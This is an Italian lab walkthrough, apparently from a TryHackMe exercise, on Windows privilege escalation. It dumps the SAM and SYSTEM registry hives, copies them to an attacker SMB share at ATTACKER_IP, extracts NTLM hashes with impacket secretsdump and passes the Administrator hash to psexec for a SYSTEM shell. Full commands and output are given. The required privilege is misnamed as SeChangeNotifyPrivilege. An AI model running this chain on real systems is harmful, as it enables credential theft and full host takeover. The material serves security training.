tags: windows priv_esc abuso_privilegi privilage_escalation SeImpersonatePrivilege
Questo tipo di scalata di privilegi si effettua ottenendo i privilegi di altri utenti, è possibile vedere i privilegi del proprio utente digitando il comando:
whoami /priv
Puoi trovare dettagli specifici su ogni stato di privilegio a queste due pagine Microsoft Priv2Admin.
Quando si hanno i privilegi SeChangeNotifyPrivilege possiamo utilizzare i seguenti comandi per copiarci i backup degli hash SAM e System:
C:\> reg save hklm\system C:\Users\THMBackup\system.hive
The operation completed successfully.
C:\> reg save hklm\sam C:\Users\THMBackup\sam.hive
The operation completed successfully.Questi file ce li possiamo trasferire nella nostra macchina attaccante tramite per esempio il software di impacket smbserver.py nel seguente modo:
Dalla macchina attaccante eseguiamo questi comandi:
# è importantissimo creare questa cartella altrimenti il comando seguente non funzionerà:
mkdir share
python3 /opt/impacket/examples/smbserver.py -smb2support -username THMBackup -password CopyMaster555 public share
Dalla macchina vittima digitiamo i seguenti comandi:
C:\> copy C:\Users\THMBackup\sam.hive \\ATTACKER_IP\public\
C:\> copy C:\Users\THMBackup\system.hive \\ATTACKER_IP\public\Una volta trasferito nella nostra macchina possiamo utilizzare il software sercretdump.py sempre di impacket per estrarre gli hash e infine utilizzare sempre un software di impacket chiamato psexec.py per ottenere i privilegi di root, come mostrato di seguito:
user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCAL
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
user@attackerpc$ python3 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 [email protected]
Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation
[*] Requesting shares on 10.10.175.90.....
[*] Found writable share ADMIN$
[*] Uploading file nfhtabqO.exe
[*] Opening SVCManager on 10.10.175.90.....
[*] Creating service RoLE on 10.10.175.90.....
[*] Starting service RoLE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system